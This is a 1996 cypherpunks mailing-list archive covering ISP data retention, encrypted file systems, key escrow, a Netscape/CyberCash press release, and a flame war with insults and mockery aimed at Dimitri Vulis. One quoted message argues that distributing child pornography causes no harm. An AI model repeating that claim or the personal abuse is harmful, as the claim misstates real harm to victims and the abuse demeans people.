> refused to accept it to rent a car.  (the agent was pretty snotty about
> it, too)  Beginning of a trend?

Did he recognize that it wasn't a "real" card himself?  I find that many
cashiers don't know what it is.  If you just say its a Visa (or MC etc.)
they'll use it.  It works just like a real card when they swipe it.


> - -- 
>            Roy M. Silvernail     [ ]      roy@scytale.com
> DNRC Minister Plenipotentiary of All Things Confusing, Software Division
> PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18
> B6                 Key available from pubkey@scytale.com
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMlzp0xvikii9febJAQFatAP9EUJ8i0xqt7G03C8nDreZ+YcO04a9x/xI
> R/ZzX+xQSo1Oe6xbB5IvyEeLuoO2SsXrHroLNE7AekgqQnyK9JprxcykUlxkKSEq
> IVL+QHbR2Y8nvO8qINp3G7ToU6HfsISOJtFl8mVtcy2eukMgqErVcIhqOYbafsf+
> CZfMIKaJsM8=
> =6AQd
> -----END PGP SIGNATURE-----
> 
> 

--------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Thu, 10 Oct 1996 16:24:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <325c26935621002@noc.tc.umn.edu>
Message-ID: <ML-2.2.844989814.7457.scott@homebox.>
MIME-Version: 1.0
Content-Type: text/plain


Kevin L Prigge said
> Timothy C. May said:
> 

... stuff deleted ...

> > Something ISPs could do--and may do if there is sufficient customer
> > pressure--is to adopt a policy of "forward secrecy" (to slightly abuse
> > this technical term). That is, to have an explicit policy--implemented
> > in the software--of _really_ deleting the back messages once a customer
> > downloads them to his site. This means that _backups_ must be done in a
> > careful manner, such that even the backup tapes or disks are affected by a
> > removal. 
> 
> Interesting thought, but it fails when it gets to my scale. It would
> be trivial to exclude a file or set of files from normal backup, but
> it would be problematic to exclude files from filesystem dumps, etc.
> The scale I deal with (40,000 users, 12gb of /home directory files and
> about the same in the mail spool) would make it almost impossible to
> provide this service with accuracy to my users.
> 
How hard would this be? (and would it work?)

Use an encrypted file system, something like Matt Blazes CFS which allows each
user to set up his own encrypted directories.  The encryption is file by file
so that backups can be made by the system, but the backups are still encrypted.

Unlike CFS, this system would allow public key cryptography.  The system could
write to a directory using the public key, but only the user could read from
the directory.  As usual, to speed things up, the PK cryptography would just be
used to encrypt/decrypt conventional keys which would be used for the
encryption/decryption of the data.  With this in place, when email comes in, it
could be stored in the recipient's directory of the hard drive.  I guess I'm
assuming that the user has a shell account.

> 
> -- 
> Kevin L. Prigge                     | Some mornings, it's just not worth
> Systems Software Programmer         | chewing through the leather straps.
> Internet Enterprise - OIT           | - Emo Phillips
> University of Minnesota             |
> 
> 

--------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 10 Oct 1996 12:32:29 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010064043.5943A-100000@crl4.crl.com>
Message-ID: <199610102031.OAA27600@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


    WOW!   Dimitri as the featured roast, Dean Martin style, would be
    enough for me to seriously consider leaving my high desert Utah
    safe house!  

  "Circus?  Why would I want to go to the circus?. 
      Dimitri is the featured speaker at SF CP Mtg!"

        (apologies to Will Rogers)

--
  Truth is always stranger than fiction,
    and the line between is perception. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 10 Oct 1996 16:41:56 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010064043.5943A-100000@crl4.crl.com>
Message-ID: <Pine.SCO.3.93.961010190453.21613D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, Sandy Sandfort wrote:

> I am hereby pledging US$100 towards a fund to fly Dimitri to the
> SF Bay area for a Cypherpunk meeting.  I certainly would like to
> meet a real cryptographer, and I'm sure many of you would too.
> We should throw in a hotel room and local transportation as well.  
> I want Dimitri to be our featured speaker--his choice of topic, 
> of course.

It's strange that all this stuff with Dimitri has reached the level that
it has.  I don't know how many CPers finally made it for INFOWARCON in DC
last month, but I was pleasantly surprised to find that, in addition to
myself, there were several others, including Dimitri.  In fact, Dimitri
and I sat together with Eric Hughes and a couple of other list members
during lunch one day.

I am afraid that, for those of you who do not know him and are expecting
some ranting tyrant, you're going to be rather disappointed.  He was
soft-spoken, almost difficult to hear, sometimes, it seemed, even rather
shy.  He made numerous insightful comments on any number of topics, was a
pleasant conversationalist, and, in fact, acted like a gentleman in ever
instance when I saw or spoke with him.  To meet him solely in person,
you'd be impressed with his obviously diverse education and background,
and rather quiet disposition.  As anti-climactic as it may be, he was 
actually a nice, unassuming fellow with a sense of humor and a
pleasant demeanor.  Hell, he even had decent table manners.

Which is why, for the life of me, I can't understand how all these
postings from him are coming from the same human being.  The man I met
seemed incapable of such rage, bitterness and utter detestation.  It's as
much Jekyll/Hyde as I've ever seen between on and off line personas.

Oh, well - maybe there really _are_ that many people for whom life on the
screen is lived through some distortion or parallel of who and what they
are.  I like the realspace Dimitri much better, and I certainly don't want
to dissuade anyone from contributing, nor would I seek to scuttle a free
trip to S.F for Dimitri, but some mysteries are best left undiscovered. If
it's high-stakes entertainment you seek, you may find that you prefer the
character to the actor.

------------------------------------------------------------------------- 
|And if Dole wins and dies in office, they|        Mark Aldrich         |
|could just pickle him and no one would   |   GRCI INFOSEC Engineering  |
|notice.  It wouldn't be the first time we|     maldrich@grci.com       |
|had a dill-dole running the country.     | MAldrich@dockmaster.ncsc.mil|
|               -- Alan Olsen             |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Oct 1996 16:31:33 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010152126.10434B-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.961010193221.27368D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> P.S.	Regretably, if Dimitri has big enough 'nads to
> 	take us up on this offer, as my guest, he will
> 	be under the mantle of my protection.  Therefore,
> 	no kinetic, edged or energy weapons allowed.
>  
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I doubt he's got the nads.  He'd take the money and run, or take the 
ticket and get a refund or something.  so if all those weapons are out of 
the way, that leaves biological weaponry.  This means that we have to 
find someone who's got a really bad case of the flu to shake his hands, 
right? :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Oct 1996 16:34:42 -0700 (PDT)
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Swan song...
In-Reply-To: <199610100701.DAA13077@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.961010193557.27368E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me know when you'll do this.  I'd like to add it to the filtered 
list. :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 10 Oct 1996 12:58:58 -0700 (PDT)
To: stewarts@ix.netcom.com
Subject: Re: PGP implements Key Recovery today!
In-Reply-To: <199610081636.MAA10922@attrh1.attrh.att.com>
Message-ID: <199610102056.OAA28387@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        No, this is too simple for the mindless bureaucrats!   

        The next thing Al Bore will ask will be for them to be copied
    on every message and the private key stored with government 
    trusted (read stooges) key escrow.

        It has been at least 130 years since any federal omnipotent 
    'Judge Roy Bean, Law West of Pecos' sack of coal walking on 
    water has ever considered the original intent: 

            "...it is better than 100 guilty go free, 
                than 1 innocent man be convicted."   

        Seems to me someones last words were: 

            "...give me liberty of give me death."

        However, I will graciously step aside so you can jump first
    from the gallows.  I'll stick around, and be a pain in the arse! 


In <199610081636.MAA10922@attrh1.attrh.att.com>, on 10/08/96 
   at 09:37 AM, stewarts@ix.netcom.com said:

-.PGP has provided a key recovery option for several years.
-.You can either use the EncryptToSelf option, or use multiple recipients, one
-.of which is your favorite backup service (or yourself,
-.perhaps one of your other keys.)  Works fine, and you can use it to recover
-.the session key when you want.  Keep a backup copy
-.of your private key on a floppy in your safe deposit box,
-.and maybe keep your passphrase on a yellow sticky (:-)
-.and you're all set.

    [snip...>|]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 10 Oct 1996 20:25:00 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <a23LVD7w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961010201439.4440A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 10 Oct 1996, Dimitri wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> > his choice of topic, of course.
> 
> "Timmy May and his sexual perversions". Illustrated with slides.

As I said, Dimitri's choice of topic.  I take it that his reply
means he is accepting my offer.  Please contact me via private
e-mail, Dimitri, so we may work out the details of your trip and
presentation.  Will you need a slide projector, or will you bring
your own?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vitamin@best.com
Date: Thu, 10 Oct 1996 19:33:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Burmese fonts and Netscape Browser
Message-ID: <2.2.16.19961011033318.3aef3640@best.com>
MIME-Version: 1.0
Content-Type: text/plain




Has anyone played in Java with Burmese fonts?

Any pointers would be greatly appreciated!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 10 Oct 1996 20:59:41 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <a23LVD7w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9610102018.A7812-0100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> > his choice of topic, of course.
> 
> "Timmy May and his sexual perversions". Illustrated with slides.
> 
Somehow I don't think that would be appropriate for a Cypherpunks 
meeting.  (Not to mention the fact that it has no crypto-relevance :).  
How about you and Tim sit down and *NICELY* talk about your differences?  
It would make a nice change from your one-sided rants to the list, and 
would probably be a lot more civil, too.



Zach Babayco 

zachb@netcom.com   <-------Finger for PGP Public Key
http://www.geocities.com/SiliconValley/Park/4127
-----
If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header.  I have several useful FAQ's and documents 
available.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 10 Oct 1996 21:06:54 -0700 (PDT)
To: "Mark M." <markm@voicenet.com>
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <Pine.LNX.3.95.961010160627.792A-100000@gak.voicenet.com>
Message-ID: <Pine.SUN.3.91.961010210423.6078A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the pointer; I'll check it out... Guess I should have been
looking here on eff.org rather than elsewhere. EPIC has some good stuff
too at http://www.epic.org/privacy/wiretap/

-Declan


On Thu, 10 Oct 1996, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Thu, 10 Oct 1996, Declan McCullagh wrote:
> 
> > A month or two ago, I searched through the existing DT statute and posted 
> > language that could be interpreted as applying to ISPs. If there's an ISP
> > exemption I missed, please post...
> 
> I originally read that ISP's were exempt from a Wired article in the February
> '96 issue.  I did some searching on EFF's web site and found the text of the
> 1994 draft of DT.  The bill says that information services and private networks
> are exempt from the requirements of subsection (a).  I have no idea what
> subsection a is, but a seperate analysis by the EFF does say that the bill
> does not apply to Internet Service Providers.  Maybe there is some section
> of the bill that does cover ISP's, but I don't think it is anything relating
> to facilitating wiretapping.
> 
> I found this information at
> http://www.eff.org/pub/Privacy/Digital_Telephony_FBI.
> 
> Mark 
> - -- 
> finger -l for PGP key
> PGP encrypted mail prefered.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3
> Charset: noconv
> 
> iQEVAwUBMl1aaizIPc7jvyFpAQFQdAgAoiWWFAEAnZY8Wa/b/LjbTGjxpG4C3IIJ
> n2R7vyE7Xu3w6xLYE8bwv27zuULgo0frw9Cw45fOehelT5x/e8wazNDjJ/zddBUu
> aE+6Nm1s6bAYVr+eIIaDT+uWz4S/H3HT2QNCmypXC0suecXtKqpSa0Ug4HsxQCYV
> yHOovHZAmIAMbKHvoZ8FlnXG4YCYD9yoIVL4HMuBW4pNqCfNs1VqzegfoBiOs4E/
> AOwTuSSC0W0frh6joDyt0Oymi8dd1rPvI2U5gYQxntKc8sd31XPJoL4Qr/e091q1
> 1mVOxJbrVH2DHRNR/WE8+iiU2tBCss4H9bk1kVsodnRogyPjUDfyuQ==
> =RX8E
> -----END PGP SIGNATURE-----
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Thu, 10 Oct 1996 13:15:57 -0700 (PDT)
To: "'Cypherpunks'" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: RE: AW: Binding cryptography - a fraud!
Message-ID: <01BBB6EF.D6A076E0@port04.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith[SMTP:EALLENSMITH@ocelot.Rutgers.EDU] wrote:
>From:	IN%"everheul@NGI.NL"  "Eric Verheul" 10-OCT-1996 07:31:16.85

>	I would be curious as to whether you believe that China should be
>permitted to do censorship as part of "national law." If your answer is yes,
>I would ask if you would believe that Germany's Holocaust was something that
>should be permitted as a part of "national law." In other words, national
>sovereignty is not something that should be permitted to override individual
>liberties.
>
Censorship is something else than demanding (and checking) that people comply
with the policy of a voluntary system. Would you consider Microsoft sueing users
of illegal Microsoft software also a "censorship".
 
>>Wait a minute. It is a *voluntary* system, but it has some rules that 
>>apply. The whole
>>idea here is: if you don't like it, use your own system. "Fraude" refers to 
>
>
>>>Maybe I'm biased:  I'm a libertarian who believes that sending the wrong
>>>bits shouldn't be considered a crime.  The problem we have is with the
>>Depends, it might be childrens pornography. The information society is 
>>*not* about
>>bits, but about information.
>
>	If the bits carry information, then restricting the bits is restricting
>the information. I would point out that no harm whatsoever is being done to
>children in the _distribution_ of such pornography; such harm is only done in
>the _manufacture_ of such pornography
There is no harm in firing at somebody, harm is only done when hit somebody.
Distribution is part of the manufactury process. Don't go to Belgium for a
vacation, and start stating these kind of things. 

>	It is only theoretically a voluntary system; governments such as
> China's, Germany's, etcetera could require that it be used with these
> goverments as the TRA (or, essentially equivalently, someone licensed by
> such a government).
>	Quite simply, you've invented a system that makes censorship more
>possible. As a scientist, I try to avoid areas that have such negative
>effects; I won't work on biological warfare, for instance. I would like to
>suggest that you follow such ethics also; you have not.
>	-Allen
>
I agree to some extend that our system could be used in a totalitarian country, to make
certain censorship possible. On the other hand, it doesn't make their job especially easy:
they can forbid and control any type of "strange" data, i.e. encrypted data. One could
argue that our system at least gives security between citizens. 

The whole problem is that you don't trust your government, well I do (till some
extend). I get the impression that this is a typical USA problem.


Eric 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 19:01:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Swan song...
In-Reply-To: <325D0249.1E36@gte.net>
Message-ID: <5w3LVD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> Perry E. Metzger wrote:
> > Well, folks, after four or five years here, I'm finally leaving.
>
> [pathetic whining snipped]
>
> > The new list will be run very tightly. Some people will doubtless
> > label me a fascist and say I'm impinging on their ability to be
> > "free". Those that feel that the best use of their freedom is to
> > urinate into their own drinking water are entitled to their beliefs --
> > but they will not be welcome on the new list.*
>
> [more whining snipped]
>
> Nothing in the real world is perfect, ideal, or even relatively close to
> either one.  If you want to really solve your problems, it will not
> likely be in running away, but in getting some therapy (seriously).
>
> As far as Fascist goes, fascism is fun enough when everyone gets to
> participate, but I get the idea you feel "some of the pigs are more
> equal than others", if you know what I mean, and I think you do.
>
> I haven't been on the list more than 6-8 weeks, but in that time, it's
> been more interesting than I would have guessed for a non-technical
> forum, which isn't necessarily good, but this is the real world.

It's time to split the folks who want to do crypto from the folks who
want to read Timmy May's inanities, lies, and personal attacks.

Who gets to keep the name "cypherpunks"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 19:01:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010064043.5943A-100000@crl4.crl.com>
Message-ID: <a23LVD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> his choice of topic, of course.

"Timmy May and his sexual perversions". Illustrated with slides.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 10 Oct 1996 21:24:30 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: PLEDGES
In-Reply-To: <Pine.SUN.3.91.961010152846.10434D-100000@crl.crl.com>
Message-ID: <Pine.BSF.3.91.961010231058.14257B@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




I'm in for $50.

Anyone else up for hearing the good Dr. discuss crypto instead of sexual 
perversity and social disfunctions?

-r.w.


>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> Just got a private pledge for another $50.  With Ray's $50 and
> my $100, we are making a big dent in the cost of getting Dimitri
> out here.  Still haven't heard from Dimitri, though.  (I guess 
> it's hard to type one-handed.)  :-)
> 
> In the likely circumstance that we get more money pledged than is 
> required to fete Dimitri, I'll return the excess to donors on a
> pro rata basis.  For now, though, I need more pledges.  Thanks.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Thu, 10 Oct 1996 02:13:30 -0700 (PDT)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Crypto AG - Secret GAK Partner ?
In-Reply-To: <Pine.3.89.9610100148.A6104-0100000@netcom6>
Message-ID: <325D2287.203F@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> > Some one recently gave me a copy of an article in Der Spiegel
> > (unfortunately in german!) stating that Crypto AG of Switzerland
> > had passed the keys to the German Govt without informing the
> > customer.
> 
> This is nothing new. But how about faxing the article to John Young, so
> we all may benefit?

Can someone email me John Young's fax number? 

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 20:50:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Tim May is a fine person.
In-Reply-To: <199610101757.KAA00401@miron.vip.best.com>
Message-ID: <sV8LVD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May once again praised himself "anonymously":

anonymous@miron.vip.best.com writes:

> Tim May's support of cryptography is an example of his
> typically irreproachable behavior and exquisite maners
> and above all his superior consideration. Indeed, Tim May
> is a lord amoung lords, the most illustrious of them all.

How pathetic. Clearly, no person is willing to put their name on
a statement supporting this flamer and spammer, totally ignorant
of cryptgraphy, and widely disrespected by his colleagues.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 10 Oct 1996 22:02:30 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <a23LVD7w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.961010235151.14257F-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 10 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> > his choice of topic, of course.
> 
> "Timmy May and his sexual perversions". Illustrated with slides.
> 

Given the choice of discussing crypto, or his own bizzare fantasies, the 
Good Dr. opts for the latter ...

Somehow, I'm not at all surprised.

Can we book his flight on ValuJett?

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peponmc@chris.com (Michael Peponis)
Date: Thu, 10 Oct 1996 17:04:11 -0700 (PDT)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010064043.5943A-100000@crl4.crl.com>
Message-ID: <325d8cb6.27887119@205.164.13.10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996 07:01:45 -0700 (PDT), you wrote:

:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:                          SANDY SANDFORT
: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
:
:Bay Area Cypherpunks,
:
:I am hereby pledging US$100 towards a fund to fly Dimitri to the
:SF Bay area for a Cypherpunk meeting. 

Set a date for this event, I fly around the country, if I can arrange
my schedual around the time of this meeting, I will gladly match the
100 USD.

:We should throw in a hotel room
Not so fast, let's see, if his topic is good, then I will contribute
another $50 twords a stay at the Embasy Suites in Walnut Creek ( Very
Nice Dimitri, they serve breakfast in bed upon request)

 On the flip side, if he doesn't live up to the expectations of being
a world class cryptographer, well he can flop out in one of the BART
stations downtown.

:and local transportation as well.  
Let's tie this to how well he does too, if he does well, we get him a
car, if he flunks out, well, he's covered there too, He can panhandle
for change and ride BART.

Regards,
Michael Peponis
PGP Encyrpted mail prefered for business corespondence
finger mianigand@outlook.net for public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 10 Oct 1996 21:30:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <2F0LVD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems that this batch didn't make it to the list, so I'm trying again...

News Release (Netscape): Monday, October 7, 1996

Netscape to Use CyberCash Technology

Netscape Communications Corporation (NASDAQ: NSCP) and CyberCash, Inc. (NASDAQ:
CYCH) today announced a technology and marketing relationship to broaden
payment options for Internet consumers. As part of the agreement, CyberCash has
licensed its CyberCoin Internet payment technology to Netscape. Netscape will
bundle its technology into future versions of Netscape products, including
Netscape LivePayment server software for online payment processing.

The two companies will also collaborate on including future CyberCash payment
services, such as CyberCash's electronic check services, into future Netscape
commerce offerings. Netscape and CyberCash plan to jointly market these
Internet payment solutions to consumers and businesses, and will work together
on efforts to accelerate the deployment of Secure Electronic Transactions (SET)
credit card payment protocol in the marketplace.

"We have had customer demand for small value payment technology particularly
from the professional information publishing industry -- the integration of
CyberCash's CyberCoin with Netscape's commerce solutions provides our customers
with a way to complete small transactions over the Internet," said Srivats
Sampath, vice president of marketing for server, tools and applications at
Netscape. "By offering a range of payment options for businesses and consumers,
Netscape and CyberCash will help expand the range of goods and services
available in the electronic marketplace."

"Combined with Netscape's customer base, CyberCoin is filling a need in the
marketplace for small payment processing," said Denis Yaro, executive vice
president, products and operations at CyberCash. "This is a huge step in our
efforts to bring Internet transaction technology to consumers and businesses
and to increase online inventory, making the virtual mall a reality."

"We are pleased to see this agreement between Netscape and CyberCash," said
Chuck White, senior vice president of First Data Card Services Group's
Electronic Funds Services unit. "The relationship between Netscape and
CyberCash will make it easier to deliver integrated payment solutions to our
client financial institutions, and their merchant customers that are using
Netscape LivePayment."

CyberCoin is a payment service which permits online purchases for items costing
between 25 cents and $10.00. This new payment solution opens up significant
opportunities for merchants to market low cost, high value items such as news
and information, graphics, games and music. It also allows merchants to
unbundle larger product offerings, and sell them in smaller increments.
Financial institutions to offer the CyberCoin service include First Union Bank,
First USA Paymentech, Michigan National Bank and First Data Corp.

Bundling CyberCash's CyberCoin technology into future releases of Netscape's
LivePayment point-of-sale software will enable online businesses to accept
multiple payment methods and implement new pricing and business models.
Netscape LivePayment will integrate this new payment functionality seamlessly
and cost-effectively, providing business people with administration and
configuration controls with flexible logging reports, and a variety of sample
merchant applications to minimize the start-up development costs of merchants.
Both Netscape and CyberCash will market Netscape LivePayment software to
businesses looking to develop or expand online distribution channels.

Netscape plans to integrate CyberCoin into future versions of Netscape
Navigator client software, which includes technology that streamlines
consumers' shopping experience by providing a uniform interface for Internet
purchases and transactions. Similar to a real wallet, this technology will
organize into one place a user's credit card numbers, shipping addresses,
digital IDs, electronic receipts and other payment instruments needed to
purchase goods and services on the Internet.

Netscape and CyberCash will coordinate their efforts on SET to assure
interoperability between their credit card-related electronic commerce
implementations. Netscape was one of the principal architects of the SET
specifications proposed by Visa International and MasterCard International.
Committed to being among the first to deliver SET-compliant products to the
marketplace, both Netscape and CyberCash will also collaborate with other
important industry leaders in an effort to facilitate SET's arrival in the
shortest possible timeframe. About Netscape Netscape Communications Corporation

(NASDAQ: NSCP) is a leading provider of open software for linking people and
information over enterprise networks and the Internet. The company offers a
full line of clients, servers, development tools and commercial applications to
create a complete platform for next-generation, live online applications.
Netscape Communications Corporation is based in Mountain View, California.

About CyberCash

CyberCash, Inc., (NASDAQ: CYCH), of Reston, Virginia, founded in August 1994,
is a leading developer of software and service solutions for secure financial
transactions over the Internet. The CyberCash system is designed to allow banks
to offer secure Internet payments to their customers. CyberCash works with
virtually all financial processing institutions, and is currently working with
VISA and MasterCard to develop and implement the Secure Electronic Transaction
(SET) protocol for online credit card transactions. The company's initial
service, which handles payments using major credit cards, was introduced in
April 1995.

CyberCoin, the company's innovative micropayment service that enables cash
transactions, was launched on Sept. 30, 1996. CyberCash's electronic check
service is expected to be released in Q4, 1996.



Edge: Tuesday, October 8, 1996

VeriFone Introduces Personal ATM and VeriSmart

